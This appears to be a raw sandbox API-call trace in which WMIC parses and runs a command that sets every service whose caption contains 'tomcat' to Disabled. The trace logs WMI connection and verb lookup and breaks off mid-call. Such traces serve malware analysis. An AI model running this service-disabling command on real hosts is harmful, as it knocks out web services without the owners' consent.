SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.574] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.574] SysStringLen (param_1="TABLE") returned 0x5 [0120.574] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.574] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.574] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.574] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.574] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.574] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.574] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.574] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.574] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.574] SysStringLen (param_1="TABLE") returned 0x5 [0120.574] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.574] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.574] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.574] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.574] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.574] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.574] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.574] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.574] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.574] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.574] FreeThreadedDOMDocument:IUnknown:Release (This=0xac45a8) returned 0x0 [0120.575] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'" [0120.575] memcpy_s (in: _Destination=0xcd8060, _DestinationSize=0x9e, _Source=0xd11588, _SourceSize=0x9c | out: _Destination=0xcd8060) returned 0x0 [0120.575] GetLocalTime (in: lpSystemTime=0x91f800 | out: lpSystemTime=0x91f800*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0xd, wMilliseconds=0x1b2)) [0120.575] _vsnwprintf (in: _Buffer=0xcd8108, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x91f7e0 | out: _Buffer="04-15-2018T10:09:13") returned 19 [0120.575] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.575] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.575] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.575] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.575] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.575] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.575] lstrlenW (lpString="SERVICE") returned 7 [0120.575] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0120.575] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.575] lstrlenW (lpString="WHERE") returned 5 [0120.575] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0120.575] memmove_s (in: _Destination=0xcd2c78, _DestinationSize=0x4, _Source=0xcd2c68, _SourceSize=0x4 | out: _Destination=0xcd2c78) returned 0x0 [0120.575] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.575] lstrlenW (lpString="'caption LIKE '%tomcat%''") returned 25 [0120.575] _wcsicmp (_String1="'caption LIKE '%tomcat%''", _String2="\"NULL\"") returned 5 [0120.575] lstrlenW (lpString="'caption LIKE '%tomcat%''") returned 25 [0120.575] lstrlenW (lpString="'caption LIKE '%tomcat%''") returned 25 [0120.575] memmove_s (in: _Destination=0xcd7d60, _DestinationSize=0x8, _Source=0xcd2c78, _SourceSize=0x8 | out: _Destination=0xcd7d60) returned 0x0 [0120.575] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.575] lstrlenW (lpString="CALL") returned 4 [0120.575] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0120.576] memmove_s (in: _Destination=0xcd7dd8, _DestinationSize=0xc, _Source=0xcd7d60, _SourceSize=0xc | out: _Destination=0xcd7dd8) returned 0x0 [0120.576] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.576] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.576] _wcsicmp (_String1="ChangeStartMode", _String2="\"NULL\"") returned 65 [0120.576] memmove_s (in: _Destination=0xcd2318, _DestinationSize=0x10, _Source=0xcd7dd8, _SourceSize=0x10 | out: _Destination=0xcd2318) returned 0x0 [0120.576] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'") returned 74 [0120.576] lstrlenW (lpString="'Disabled'") returned 10 [0120.576] _wcsicmp (_String1="'Disabled'", _String2="\"NULL\"") returned 5 [0120.576] lstrlenW (lpString="'Disabled'") returned 10 [0120.576] lstrlenW (lpString="'Disabled'") returned 10 [0120.576] lstrlenW (lpString="QUIT") returned 4 [0120.576] lstrlenW (lpString="SERVICE") returned 7 [0120.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0120.576] lstrlenW (lpString="EXIT") returned 4 [0120.576] lstrlenW (lpString="SERVICE") returned 7 [0120.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0120.576] WbemLocator:IUnknown:AddRef (This=0xd174f8) returned 0x2 [0120.576] lstrlenW (lpString="/") returned 1 [0120.576] lstrlenW (lpString="SERVICE") returned 7 [0120.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0120.576] lstrlenW (lpString="-") returned 1 [0120.576] lstrlenW (lpString="SERVICE") returned 7 [0120.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0120.576] lstrlenW (lpString="CLASS") returned 5 [0120.576] lstrlenW (lpString="SERVICE") returned 7 [0120.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0120.576] lstrlenW (lpString="PATH") returned 4 [0120.576] lstrlenW (lpString="SERVICE") returned 7 [0120.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0120.576] lstrlenW (lpString="CONTEXT") returned 7 [0120.576] lstrlenW (lpString="SERVICE") returned 7 [0120.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0120.576] lstrlenW (lpString="SERVICE") returned 7 [0120.576] lstrlenW (lpString="SERVICE") returned 7 [0120.576] GetCurrentThreadId () returned 0xc4c [0120.576] ??0CHString@@QAE@XZ () returned 0x91f754 [0120.577] WbemLocator:IWbemLocator:ConnectServer (in: This=0xd174f8, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xd40a50) returned 0x0 [0120.601] CoSetProxyBlanket (pProxy=0xd40a50, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0120.601] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.601] GetCurrentThreadId () returned 0xc4c [0120.601] ??0CHString@@QAE@XZ () returned 0x91f6fc [0120.601] SysStringLen (param_1="root\\cli") returned 0x8 [0120.601] SysStringLen (param_1="\\") returned 0x1 [0120.601] SysStringLen (param_1="root\\cli\\") returned 0x9 [0120.601] SysStringLen (param_1="ms_409") returned 0x6 [0120.601] WbemLocator:IWbemLocator:ConnectServer (in: This=0xd174f8, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xd40640) returned 0x0 [0120.610] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.610] GetCurrentThreadId () returned 0xc4c [0120.610] ??0CHString@@QAE@XZ () returned 0x91f758 [0120.610] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0120.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xcd8a80, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0120.610] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0120.610] SysStringLen (param_1="SERVICE") returned 0x7 [0120.610] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0120.610] SysStringLen (param_1="'") returned 0x1 [0120.611] IWbemServices:GetObject (in: This=0xd40a50, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x91f754*=0x0, ppCallResult=0x0 | out: ppObject=0x91f754*=0xd65728, ppCallResult=0x0) returned 0x0 [0120.617] IWbemClassObject:Get (in: This=0xd65728, wszName="Target", lFlags=0, pVal=0x91f72c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f72c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.617] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0120.617] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0120.617] IWbemClassObject:Get (in: This=0xd65728, wszName="PWhere", lFlags=0, pVal=0x91f72c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f72c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.618] lstrlenW (lpString="WHERE Name='#'") returned 14 [0120.618] lstrlenW (lpString="WHERE Name='#'") returned 14 [0120.618] IWbemClassObject:Get (in: This=0xd65728, wszName="Connection", lFlags=0, pVal=0x91f72c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f72c*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd65ae8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.618] IUnknown:QueryInterface (in: This=0xd65ae8, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x91f748 | out: ppvObject=0x91f748*=0xd65ae8) returned 0x0 [0120.618] GetCurrentThreadId () returned 0xc4c [0120.618] ??0CHString@@QAE@XZ () returned 0x91f6c8 [0120.618] IWbemClassObject:Get (in: This=0xd65ae8, wszName="Namespace", lFlags=0, pVal=0x91f6ac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.618] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0120.618] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0120.618] IWbemClassObject:Get (in: This=0xd65ae8, wszName="Locale", lFlags=0, pVal=0x91f6ac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd47134, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.618] lstrlenW (lpString="ms_409") returned 6 [0120.618] lstrlenW (lpString="ms_409") returned 6 [0120.618] IWbemClassObject:Get (in: This=0xd65ae8, wszName="User", lFlags=0, pVal=0x91f6ac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd47134, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f6ac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.618] IWbemClassObject:Get (in: This=0xd65ae8, wszName="Password", lFlags=0, pVal=0x91f6ac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f6ac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.619] IWbemClassObject:Get (in: This=0xd65ae8, wszName="Server", lFlags=0, pVal=0x91f6ac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.619] lstrlenW (lpString=".") returned 1 [0120.619] lstrlenW (lpString=".") returned 1 [0120.619] IWbemClassObject:Get (in: This=0xd65ae8, wszName="Authority", lFlags=0, pVal=0x91f6ac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd47134, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f6ac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.619] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.619] IUnknown:Release (This=0xd65ae8) returned 0x1 [0120.619] GetCurrentThreadId () returned 0xc4c [0120.619] ??0CHString@@QAE@XZ () returned 0x91f6b8 [0120.619] IWbemClassObject:Get (in: This=0xd65728, wszName="__RELPATH", lFlags=0, pVal=0x91f6a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f6a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.619] GetCurrentThreadId () returned 0xc4c [0120.619] ??0CHString@@QAE@XZ () returned 0x91f634 [0120.619] ??0CHString@@QAE@PBG@Z () returned 0x91f630 [0120.619] ??0CHString@@QAE@ABV0@@Z () returned 0x91f5b0 [0120.619] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0120.619] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xcd8ac0 [0120.619] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0120.619] ?Left@CHString@@QBE?AV1@H@Z () returned 0x91f5a8 [0120.619] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x91f5ac [0120.619] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x91f630 [0120.619] ??1CHString@@QAE@XZ () returned 0x1 [0120.619] ??1CHString@@QAE@XZ () returned 0x1 [0120.619] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x91f5a4 [0120.619] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x91f5b0 [0120.619] ??1CHString@@QAE@XZ () returned 0x1 [0120.619] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xcd8b20 [0120.619] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0120.619] ?Left@CHString@@QBE?AV1@H@Z () returned 0x91f5a8 [0120.619] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x91f5ac [0120.619] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x91f630 [0120.619] ??1CHString@@QAE@XZ () returned 0x1 [0120.619] ??1CHString@@QAE@XZ () returned 0x1 [0120.619] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x91f5a4 [0120.619] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x91f5b0 [0120.619] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.619] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0120.619] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.620] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0120.620] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0120.620] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0120.620] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0120.620] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0120.620] SysStringLen (param_1="\"") returned 0x1 [0120.620] IWbemServices:GetObject (in: This=0xd40640, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x91f640*=0x0, ppCallResult=0x0 | out: ppObject=0x91f640*=0xd65ec8, ppCallResult=0x0) returned 0x0 [0120.622] IWbemClassObject:Get (in: This=0xd65ec8, wszName="Text", lFlags=0, pVal=0x91f60c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91f60c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd4fac0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xd43638, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.622] SafeArrayGetLBound (in: psa=0xd4fac0, nDim=0x1, plLbound=0x91f61c | out: plLbound=0x91f61c) returned 0x0 [0120.622] SafeArrayGetUBound (in: psa=0xd4fac0, nDim=0x1, plUbound=0x91f620 | out: plUbound=0x91f620) returned 0x0 [0120.622] SafeArrayGetElement (in: psa=0xd4fac0, rgIndices=0x91f638, pv=0x91f624 | out: pv=0x91f624) returned 0x0 [0120.622] SysStringLen (param_1="Service application management. ") returned 0x20 [0120.622] IUnknown:Release (This=0xd65ec8) returned 0x0 [0120.622] ??1CHString@@QAE@XZ () returned 0x1 [0120.622] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.622] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.622] lstrlenW (lpString="Service application management. ") returned 32 [0120.622] lstrlenW (lpString="Service application management. ") returned 32 [0120.622] IUnknown:Release (This=0xd65728) returned 0x0 [0120.623] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.623] lstrlenW (lpString="PATH") returned 4 [0120.623] lstrlenW (lpString="WHERE") returned 5 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0120.623] lstrlenW (lpString="WHERE") returned 5 [0120.623] lstrlenW (lpString="WHERE") returned 5 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0120.623] lstrlenW (lpString="/") returned 1 [0120.623] lstrlenW (lpString="caption LIKE '%tomcat%'") returned 23 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%tomcat%'", cchCount1=23, lpString2="/", cchCount2=1) returned 3 [0120.623] lstrlenW (lpString="-") returned 1 [0120.623] lstrlenW (lpString="caption LIKE '%tomcat%'") returned 23 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%tomcat%'", cchCount1=23, lpString2="-", cchCount2=1) returned 3 [0120.623] lstrlenW (lpString="caption LIKE '%tomcat%'") returned 23 [0120.623] lstrlenW (lpString="caption LIKE '%tomcat%'") returned 23 [0120.623] lstrlenW (lpString="/") returned 1 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0120.623] lstrlenW (lpString="-") returned 1 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] lstrlenW (lpString="GET") returned 3 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0120.623] lstrlenW (lpString="LIST") returned 4 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0120.623] lstrlenW (lpString="SET") returned 3 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0120.623] lstrlenW (lpString="CREATE") returned 6 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] lstrlenW (lpString="CALL") returned 4 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0120.623] lstrlenW (lpString="/") returned 1 [0120.623] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="/", cchCount2=1) returned 3 [0120.623] lstrlenW (lpString="-") returned 1 [0120.623] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="-", cchCount2=1) returned 3 [0120.623] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.623] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.623] GetCurrentThreadId () returned 0xc4c [0120.624] ??0CHString@@QAE@XZ () returned 0x91eec4 [0120.624] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0120.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xcd8b70, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0120.624] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0120.624] SysStringLen (param_1="SERVICE") returned 0x7 [0120.624] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0120.624] SysStringLen (param_1="'") returned 0x1 [0120.624] IWbemServices:GetObject (in: This=0xd40a50, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x91eea0*=0x0, ppCallResult=0x0 | out: ppObject=0x91eea0*=0xd65728, ppCallResult=0x0) returned 0x0 [0120.630] lstrlenW (lpString="CALL") returned 4 [0120.630] lstrlenW (lpString="CALL") returned 4 [0120.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0120.630] IWbemClassObject:Get (in: This=0xd65728, wszName="Verbs", lFlags=0, pVal=0x91ee58*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee58*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd4fa30*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xd4fd20, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.631] SafeArrayGetLBound (in: psa=0xd4fa30, nDim=0x1, plLbound=0x91ee68 | out: plLbound=0x91ee68) returned 0x0 [0120.631] SafeArrayGetUBound (in: psa=0xd4fa30, nDim=0x1, plUbound=0x91ee70 | out: plUbound=0x91ee70) returned 0x0 [0120.631] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91ee78, pv=0x91eeac | out: pv=0x91eeac) returned 0x0 [0120.631] IWbemClassObject:Get (in: This=0xd670f0, wszName="Name", lFlags=0, pVal=0x91ee48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.631] lstrlenW (lpString="StartService") returned 12 [0120.631] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.631] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StartService", cchCount2=12) returned 1 [0120.631] IUnknown:Release (This=0xd670f0) returned 0x1 [0120.631] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91ee78, pv=0x91eeac | out: pv=0x91eeac) returned 0x0 [0120.631] IWbemClassObject:Get (in: This=0xd67620, wszName="Name", lFlags=0, pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.631] lstrlenW (lpString="StopService") returned 11 [0120.631] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.631] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StopService", cchCount2=11) returned 1 [0120.631] IUnknown:Release (This=0xd67620) returned 0x1 [0120.631] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91ee78, pv=0x91eeac | out: pv=0x91eeac) returned 0x0 [0120.631] IWbemClassObject:Get (in: This=0xd67b60, wszName="Name", lFlags=0, pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.631] lstrlenW (lpString="PauseService") returned 12 [0120.631] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.631] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="PauseService", cchCount2=12) returned 1 [0120.631] IUnknown:Release (This=0xd67b60) returned 0x1 [0120.632] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91ee78, pv=0x91eeac | out: pv=0x91eeac) returned 0x0 [0120.632] IWbemClassObject:Get (in: This=0xd680a0, wszName="Name", lFlags=0, pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: 